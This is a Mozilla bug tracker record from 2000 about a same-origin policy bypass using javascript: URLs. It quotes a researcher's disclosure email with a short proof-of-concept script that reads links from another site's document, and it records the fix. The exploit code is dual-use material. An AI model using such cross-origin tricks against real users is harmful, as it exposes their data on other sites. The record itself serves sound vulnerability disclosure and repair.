Closed
Bug 32088
Opened 25 years ago
Closed 25 years ago
Circumventing Same Origin security policy using javascript: URLs
Categories
(Core :: Security, defect, P3)
Tracking
()
VERIFIED
FIXED
M15
People
(Reporter: norrisboyd, Assigned: norrisboyd)
References
()
Details
(Whiteboard: fix in hand)
Subject: Circumventing Same Origin security policy using javascript: URLs Date: Thu, 16 Mar 2000 16:23:00 +0200 From: Georgi Guninski <joro@nat.bg> To: Norris Boyd <norris@netscape.com> It is possible to circumvent Same Origin security policy using javascript: URLs. The problem is changing the location of a target document to javascript which changes the document content while the location is that of the target document. This also allows window spoofing. I would suggest disallowing navigating to javascript: URLs accross domains. The code is: ------------------------------------------------ <SCRIPT> a=window.open("http://www.yahoo.com"); a.location="javascript:document.open();document.write('<IFRAME SRC=http://www.yahoo.com></IFRAME><A HREF=javascript:alert(window.frames[0].document.links[0].href)>Click here to see the first link from Yahoo</A>');document.close()"; </SCRIPT>
Assignee | ||
Updated•25 years ago
|
Status: NEW → ASSIGNED
Target Milestone: M15
Assignee | ||
Updated•25 years ago
|
Whiteboard: fix in hand
Assignee | ||
Comment 2•25 years ago
|
||
Fixed: Checking in layout/html/document/src/nsHTMLDocument.cpp; /m/pub/mozilla/layout/html/document/src/nsHTMLDocument.cpp,v <-- nsHTMLDocumen t.cpp new revision: 3.207; previous revision: 3.206
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Assignee | ||
Updated•25 years ago
|
Group: netscapeconfidential?
Assignee | ||
Comment 3•25 years ago
|
||
CC'ing joro@nat.bg
Assignee | ||
Updated•25 years ago
|
Group: netscapeconfidential?
Updated•19 years ago
|
Flags: testcase+
Updated•17 years ago
|
Flags: in-testsuite+ → in-testsuite?
You need to log in
before you can comment on or make changes to this bug.
Description
•